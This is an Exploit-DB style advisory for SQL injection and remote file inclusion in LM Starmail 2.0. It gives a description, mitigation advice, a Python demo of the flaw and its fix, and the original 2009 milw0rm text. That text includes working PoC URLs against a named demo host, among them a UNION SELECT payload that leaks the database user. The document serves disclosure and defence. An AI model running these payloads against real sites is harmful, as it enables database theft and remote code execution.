Vendor: LM Starmail
By: int_main();
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection/File Inclusion Vuln
CWE: 89
Product Name: LM Starmail
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:script-shop24:lm_starmail:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

LM Starmail 2.0 (home.php & paidbanner.php) SQL Injection/File Inclusion Vuln

The vulnerability exists in the home.php and paidbanner.php scripts of LM Starmail 2.0. home.php passes the value of its page parameter to an include without validation, so an attacker can supply a URL and have a remote script fetched and executed (remote file inclusion; this only succeeds when the PHP host allows remote file access, which the advisory notes was disabled on the demo host it tested). paidbanner.php places its ID parameter directly into a SQL query, so an attacker can append a UNION SELECT (the PoC uses ten columns) and read arbitrary data from the database; the PoC retrieves the database user name via user().

Mitigation:

Validate the page parameter against an allowlist of local page names (never pass user-supplied values to include) and disable remote file access in the PHP configuration. For paidbanner.php, accept only an integer ID and pass it to the query as a bound parameter of a prepared statement, so that user input can never alter the query text.
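The following is an added example, not LM Starmail's own code and not part of the advisory: it runs the advisory's UNION SELECT payload against a small in-memory SQLite table that mimics the query behind paidbanner.php, and shows the hardened equivalents of both affected scripts (written in Python against SQLite rather than the product's PHP and MySQL). The table name banner, its ten column names, the page allowlist and the use of sqlite_version() in place of MySQL's user() are assumptions constructed for the example; the column count of ten is taken from the PoC.

```python
"""Added example, not LM Starmail's own code: the advisory's UNION SELECT
payload run against a small in-memory SQLite table that mimics the query
behind paidbanner.php, next to hardened versions of both affected scripts.
Assumptions (constructed here, not from the advisory): the table name
'banner', its ten column names, the page allowlist, and sqlite_version()
standing in for MySQL's user(). The column count of ten comes from the PoC."""
import re
import sqlite3
from urllib.parse import unquote_plus

# The advisory's PoC as it appears in the URL ('+' encodes spaces), with the
# MySQL-only user() swapped for sqlite_version() so it runs on SQLite.
POC_ID = "-1+union+select+1,2,3,4,5,sqlite_version(),7,8,9,10--"

COLS = ", ".join(f"c{i}" for i in range(1, 11))    # ten columns, as in the PoC
SAMPLE_ROW = tuple(f"b{i}" for i in range(1, 11))   # constructed banner record

# Constructed allowlist standing in for the pages home.php may include.
PAGES = {"home": "pages/home.php", "news": "pages/news.php"}


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one banner with ID 1 and ten columns."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE banner (ID INTEGER PRIMARY KEY, {COLS})")
    con.execute("INSERT INTO banner VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
                (1, *SAMPLE_ROW))
    return con


def decode_poc() -> str:
    """Undo the URL encoding of the PoC to get what PHP sees in $_GET['ID']."""
    return unquote_plus(POC_ID)


def sqlite_version_string() -> str:
    """The value the stand-in sqlite_version() call leaks, for comparison."""
    return sqlite3.sqlite_version


def paidbanner_vulnerable(con, raw_id: str):
    """The advisory's pattern: $_GET['ID'] concatenated into the query text.
    Anything after the number becomes part of the SQL, so a UNION SELECT
    with the right column count appends attacker-chosen rows to the result."""
    sql = f"SELECT {COLS} FROM banner WHERE ID={raw_id}"
    return con.execute(sql).fetchall()


def paidbanner_fixed(con, raw_id: str):
    """Hardened form: accept only a plain integer, then bind it as a parameter
    so the value can never change the query structure."""
    if not re.fullmatch(r"-?\d+", raw_id):
        raise ValueError("ID must be an integer")
    sql = f"SELECT {COLS} FROM banner WHERE ID=?"
    return con.execute(sql, (int(raw_id),)).fetchall()


def home_include_target(page: str):
    """Hardened replacement for home.php including $_GET['page'] directly:
    map the parameter through an allowlist, so a URL (remote inclusion) or a
    traversal path is never handed to include(). Returns None when rejected."""
    return PAGES.get(page)


if __name__ == "__main__":
    con = make_db()
    payload = decode_poc()
    print("vulnerable:", paidbanner_vulnerable(con, payload))
    try:
        paidbanner_fixed(con, payload)
    except ValueError as exc:
        print("fixed:", exc)
    for page in ("news", "http://google.de", "../../etc/passwd"):
        print(f"home.php?page={page} ->", home_include_target(page))
```

Run stand-alone, the vulnerable query returns a single attacker-supplied row whose sixth column is the SQLite version (where the real PoC shows the MySQL user), the hardened query rejects the same payload before it reaches the database, and the allowlist turns the PoC's page=http://google.de into a rejected request instead of an include.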
Source

Exploit-DB raw data:

_______         ___________
\   _  \ ___  __\_   _____/
/  /_\  \\  \/  /|    __)  
\  \_/   \>    < |     \   
 \_____  /__/\_ \\___  /   
       \/      \/    \/    
                       #ruling the web since 9/2008


  [=] LM Starmail 2.0  (home.php & paidbanner.php) SQL Injection/File Inclusion Vuln
       
       Vendor   : http://www.script-shop24.de
       Script   : LM Starmail 2.0
       Download : http://www.script-shop24.de/product_info.php/info/p68_Starmail-2-0-Paidmail.html
       Author   : int_main();
       Contact  : someone[at]jabber.ccc.de
       Site     : 0xFEE1DEAD.de
       Greez    : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs,Cod1K
      


       Exploit:

       http://[target]/home.php?page=[evilscript]
       http://[target]/paidbanner.php?ID=[sql]

       POC:

       http://script-demo.eu/Luxusmailer5/home.php?page=http://google.de
       http://script-demo.eu/Luxusmailer5/paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--


       (File access is unfortunately disabled in this case; otherwise this inclusion would work because of the coding gap.)

       Have phun, wui!

  [=]     

# milw0rm.com [2009-08-06]